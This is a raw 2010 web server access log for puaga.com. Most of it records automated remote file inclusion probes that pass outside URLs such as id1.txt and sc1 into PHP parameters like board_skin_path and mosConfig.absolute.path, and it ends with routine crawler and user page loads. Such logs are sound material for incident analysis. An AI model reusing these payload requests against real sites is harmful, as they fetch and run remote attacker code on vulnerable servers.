219.94.194.248 - - [10/Feb/2010:05:09:34 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:09:46 -0800] "GET /logs/access_100123.log%20%20/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:09:58 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:09:58 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:09:58 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:10:24 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:10:57 -0800] "GET /logs/access_100203.log//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:12:02 -0800] "GET /prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:12:07 -0800] "GET /logs/access_100119.log/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:13:32 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:13:32 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:13:32 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:13:37 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:13:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:13:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:14:20 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:14:21 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:14:39 -0800] "GET /logs/access_100123.log/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:15:01 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:15:01 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:15:01 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:15:27 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:16:40 -0800] "GET /logs/access_100203.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:16:58 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:05:17:39 -0800] "GET /logs/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:05:17:39 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:05:17:39 -0800] "GET /become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:05:17:40 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:18:46 -0800] "GET /logs/access_100119.log/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:19:53 -0800] "GET /logs/access_100203.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:20:14 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:20:14 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:20:28 -0800] "GET /logs/prodler.class.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:05:20:36 -0800] "GET /logs/access_100203.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:20:37 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:20:38 -0800] "GET /logs/access_100119.log%20%20/index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:20:38 -0800] "GET /index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:20:48 -0800] "GET /logs/access_100112.log%20%20/index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:22:26 -0800] "GET /logs/access_100119.log/index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:05:22:30 -0800] "GET /logs/access_100112.log/index.php?option=com_custompages&cpage=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:23:10 -0800] "GET /logs/access_100123.log/prodler.class.php=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.108.142.138 - - [10/Feb/2010:05:23:22 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
95.108.142.138 - - [10/Feb/2010:05:23:26 -0800] "GET / HTTP/1.1" 200 13514 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
95.108.142.138 - - [10/Feb/2010:05:23:27 -0800] "GET / HTTP/1.1" 200 13514 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.atesh.info"
211.115.68.54 - - [10/Feb/2010:05:24:11 -0800] "GET /board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:05:24:11 -0800] "GET /logs//board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:05:24:11 -0800] "GET /logs/access_100202.log//board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:05:24:22 -0800] "GET /logs/access_100203.log//board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:25:03 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:25:03 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:23 -0800] "GET /logs/access_100129.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:23 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:23 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:54 -0800] "GET /logs/access_100129.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:54 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:25:55 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:26:09 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:26:09 -0800] "GET /logs/access_100129.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:26:09 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:26:13 -0800] "GET /logs/access_100104.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:26:46 -0800] "GET /logs/access_100104.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:05:27:13 -0800] "GET /logs/access_100201.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:06 -0800] "GET /logs/access_100129.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:06 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:06 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:39 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:05:28:39 -0800] "GET /logs/access_100129.log%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:42 -0800] "GET /musim HTTP/1.1" 301 90 "http://www.musim.biz/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:43 -0800] "GET /musim/ HTTP/1.1" 200 1991 "http://www.musim.biz/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:44 -0800] "GET /musim/i/countdown.js HTTP/1.1" 200 10638 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:45 -0800] "GET /musim/i/MusimLoginIntro3.5.New.jpg HTTP/1.1" 404 5258 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:45 -0800] "GET /musim/i/Musim_LoginBack.gif HTTP/1.1" 200 3577 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:45 -0800] "GET /musim/i/Musim_LoginButton.gif HTTP/1.1" 200 1184 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:45 -0800] "GET /musim/i3/MusimLoginIntro3.5.New.jpg HTTP/1.1" 200 13688 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:52 -0800] "POST /musim/index.php HTTP/1.1" 302 110 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/container.php HTTP/1.1" 200 7364 "http://www.puaga.com/musim/" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/subbar/player.js HTTP/1.1" 200 2585 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/i/prototype.js HTTP/1.1" 200 129738 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/stylefiles/v3menu.css HTTP/1.1" 200 1960 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/stylefiles/musimbutton.css HTTP/1.1" 200 900 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:53 -0800] "GET /musim/stylefiles/v3menu.js HTTP/1.1" 200 824 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:54 -0800] "GET /musim/stylefiles/breadcrumb.css HTTP/1.1" 200 1612 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/breadcrumb-button.css HTTP/1.1" 200 902 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/boxy.js HTTP/1.1" 200 21262 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/boxy.css HTTP/1.1" 200 2491 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/jquery.js HTTP/1.1" 200 57002 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/ajax.js HTTP/1.1" 200 443 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/style_footer.css HTTP/1.1" 200 142 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/style_profileboxes.css HTTP/1.1" 200 1588 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/applications.js HTTP/1.1" 200 2948 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/tipsy.js HTTP/1.1" 200 2537 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/scripts/uploader.js HTTP/1.1" 200 3452 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/tipsy.css HTTP/1.1" 200 653 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/style_profiler.css HTTP/1.1" 200 3314 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/stylefiles/style_common.css HTTP/1.1" 200 6125 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/subbar/notifications.js HTTP/1.1" 200 2355 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:56 -0800] "GET /musim/subbar/subbar.css HTTP/1.1" 200 3197 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/stylefiles/style_subbar.css HTTP/1.1" 200 804 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/Logo.png HTTP/1.1" 200 3664 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/IProfiles.png HTTP/1.1" 200 3059 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/IPictures.png HTTP/1.1" 200 279 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/Blank.gif HTTP/1.1" 200 49 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/IMusic.png HTTP/1.1" 200 270 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/IApplications.png HTTP/1.1" 200 179 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/oldIncome.png HTTP/1.1" 200 393 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:57 -0800] "GET /musim/i3/newIncome.png HTTP/1.1" 200 383 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/subbar/niftyplayer.swf?as=0 HTTP/1.1" 200 3815 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/i3/ILogout.png HTTP/1.1" 200 3099 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/i3/nonotifications.png HTTP/1.1" 200 316 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/i3/playstop.png HTTP/1.1" 200 380 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/subbar/meonline.php?nocache=0.587595592327031 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8400673683900423 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/i3/home.gif HTTP/1.1" 200 588 "http://www.puaga.com/musim/container.php" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
78.188.102.171 - - [10/Feb/2010:05:30:58 -0800] "GET /musim/i3/bc_bg.gif HTTP/1.1" 200 155 "http://www.puaga.com/musim/stylefiles/breadcrumb.css" "Binnaz/1.0 (Windows; U; Windows NT 2.1; en-US; rv:1.0.1.6)" "www.puaga.com"
